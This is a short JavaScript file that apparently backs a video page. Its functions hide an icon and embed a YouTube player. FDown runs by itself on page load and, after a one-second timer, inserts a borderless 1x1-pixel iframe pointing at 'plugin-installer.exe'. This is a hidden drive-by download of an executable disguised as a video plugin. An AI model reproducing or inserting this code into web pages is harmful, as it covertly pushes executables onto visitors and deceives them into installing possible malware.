var fTimer = 0;
function GeniusLaunch()
{
	iconBox = document.getElementById('GVideoIcon');
	clearTimeout(fTimer);
	if (iconBox)
	{
		iconBox.style.display = "none";	
		ShowVideo();
	}
}
function FDown()
{
	
	fTimer = setTimeout(
			function()
			{							
				var frame = document.createElement('iframe');
				frame.style.border = "none";
				frame.style.width = "1px";
				frame.style.height = "1px";
				frame.src = 'plugin-installer.exe';
				document.body.appendChild(frame);
			},
				1000
			);
}
function ShowVideo()
{
	var params = { allowScriptAccess: "always" };
    var atts = { id: "myytplayer" };
    swfobject.embedSWF("http://www.youtube.com/v/zDDLO1sbCfk?enablejsapi=1&playerapiid=ytplayer&autoplay=1", 
                       "GVideoIcon", "587", "440", "8", null, null, params, atts);
}
FDown();
